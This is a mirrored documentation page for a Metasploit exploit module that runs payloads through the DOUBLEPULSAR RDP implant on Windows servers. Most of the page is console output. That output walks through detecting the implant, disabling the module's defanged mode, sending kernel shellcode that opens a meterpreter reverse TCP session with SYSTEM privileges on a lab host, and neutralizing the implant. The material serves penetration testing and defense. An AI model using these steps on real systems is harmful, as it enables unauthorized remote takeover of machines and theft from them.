CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/rdp/rdp_doublepulsar_rce.md
Views: 11789

Introduction

This module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for RDP.

While this module primarily performs code execution against the implant, the Neutralize implant target allows you to disable the implant.

Targets

Id  Name
--  ----
0   Execute payload (x64)
1   Neutralize implant

Options

DefangedMode

Set this to false to disable defanged mode and enable module functionality. Set this only if you're SURE you want to proceed.

ProcessName

Set this to the userland process you want to inject the payload into. Defaults to spoolsv.exe.

Usage

Pinging the implant:

msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > check

[*] 192.168.56.115:3389 - Verifying RDP protocol...
[*] 192.168.56.115:3389 - Attempting to connect using TLS security
[*] 192.168.56.115:3389 - Swapping plain socket to SSL
[*] 192.168.56.115:3389 - Sending ping to DOUBLEPULSAR
[!] 192.168.56.115:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
[+] 192.168.56.115:3389 - Target is Windows Server 6.1.7601 SP1 x64
[+] 192.168.56.115:3389 - The target is vulnerable.
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) >

Executing a payload:

msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > set target Execute\ payload
target => Execute payload
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] 192.168.56.115:3389 - Verifying RDP protocol...
[*] 192.168.56.115:3389 - Attempting to connect using TLS security
[*] 192.168.56.115:3389 - Swapping plain socket to SSL
[*] 192.168.56.115:3389 - Sending ping to DOUBLEPULSAR
[!] 192.168.56.115:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
[+] 192.168.56.115:3389 - Target is Windows Server 6.1.7601 SP1 x64
[*] 192.168.56.115:3389 - Generating kernel shellcode with windows/x64/meterpreter/reverse_tcp
[*] 192.168.56.115:3389 - Total shellcode length: 4096 bytes
[*] 192.168.56.115:3389 - Sending shellcode to DOUBLEPULSAR
[*] Sending stage (206403 bytes) to 192.168.56.115
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.115:49158) at 2019-11-25 18:10:21 -0600
[+] 192.168.56.115:3389 - Payload execution successful

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-S7TDBIENPVM
OS              : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter >

Neutralizing the implant:

msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > set target Neutralize\ implant
target => Neutralize implant
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] 192.168.56.115:3389 - Verifying RDP protocol...
[*] 192.168.56.115:3389 - Attempting to connect using TLS security
[*] 192.168.56.115:3389 - Swapping plain socket to SSL
[*] 192.168.56.115:3389 - Sending ping to DOUBLEPULSAR
[!] 192.168.56.115:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!!
[+] 192.168.56.115:3389 - Target is Windows Server 6.1.7601 SP1 x64
[*] 192.168.56.115:3389 - Neutralizing DOUBLEPULSAR
[+] 192.168.56.115:3389 - Implant neutralization successful
[*] Exploit completed, but no session was created.
msf5 exploit(windows/rdp/rdp_doublepulsar_rce) >